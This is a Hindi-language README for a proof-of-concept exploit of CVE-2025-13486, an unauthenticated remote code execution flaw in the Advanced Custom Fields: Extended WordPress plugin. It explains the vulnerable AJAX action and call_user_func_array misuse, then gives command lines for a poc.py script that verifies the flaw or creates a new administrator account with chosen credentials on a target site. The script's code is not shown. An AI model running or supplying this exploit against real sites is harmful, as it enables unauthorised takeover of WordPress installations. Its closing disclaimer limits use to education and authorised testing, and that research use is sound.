
CVE-2025-13486 के लिए POC
CVE-2025-13486 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) एक्सप्लॉइट, जो Advanced Custom Fields: Extended (ACFE) वर्डप्रेस प्लगइन में एक रिमोट कोड एक्सीक्यूशन (RCE) भेद्यता है।
यह भेद्यता ACFE संस्करण 0.9.0.5 से 0.9.1.1 में मौजूद है, जो बिना प्रमाणीकरण के हमलावरों को acfe/form/render_form_ajax AJAX एक्शन के माध्यम से मनमाने PHP फंक्शन निष्पादित करने की अनुमति देती है। प्लगइन उचित सत्यापन के बिना उपयोगकर्ता द्वारा प्रदान किए गए इनपुट के साथ call_user_func_array() का उपयोग करता है।
print_r का उपयोग करके सुरक्षित रूप से जाँचें कि लक्ष्य संवेदनशील है या नहीं (गैर-विनाशकारी)pip install requests
python poc.py -u http://target-site.com --verify
# With random credentials (displayed after execution)
python poc.py -u http://target-site.com
# With custom credentials
python poc.py -u http://target-site.com --user admin123 --password P@ssw0rd! --email [email protected]
-u, --url Target WordPress URL (required)
--verify Only verify vulnerability (safer, uses print_r)
--user Username to create (default: random)
--password Password to set (default: random)
--email Email address to set (default: random)
यह PoC केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें।